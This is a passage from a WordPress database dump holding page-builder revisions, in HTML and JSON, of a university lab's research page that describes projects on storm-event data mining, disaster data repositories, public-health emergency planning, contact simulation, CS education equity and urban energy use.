style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n            <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n            <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n                      districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n                      demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n                      and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:17:45','2023-09-29 15:17:45','',126,'https://gsudice.dataconn.net/?p=1557',0,'revision','',0),(1563,1,'2023-09-29 11:19:47','2023-09-29 15:19:47','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 7\",\"attrs\":{\"id\":\"about-7\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c47\",\"parentId\":\"126-c46\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c47\",\"index\":0,\"id\":\"126-c48\",\"partialId\":126,\"styleRef\":876,\"type\":\"content\",\"props\":{\"content\":\"DICE Data Repository\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c47\",\"index\":2,\"id\":\"126-c50\",\"partialId\":126,\"styleRef\":878,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: &quot;Open Sans&quot;; color: rgb(64, 85, 169);\\\">The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;<\\/span><\\/p>\"}}],\"styleRef\":875,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c51\",\"parentId\":\"126-c46\",\"partialId\":126,\"styleRef\":879,\"type\":\"content\"}],\"id\":\"126-c46\",\"parentId\":\"126-c45\",\"partialId\":126,\"styleRef\":874,\"type\":\"content\"}],\"id\":\"126-c45\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":873,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:19:47','2023-09-29 15:19:47','',438,'https://gsudice.dataconn.net/?p=1563',0,'revision','',0),(1564,1,'2023-09-29 11:19:47','2023-09-29 15:19:47','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D 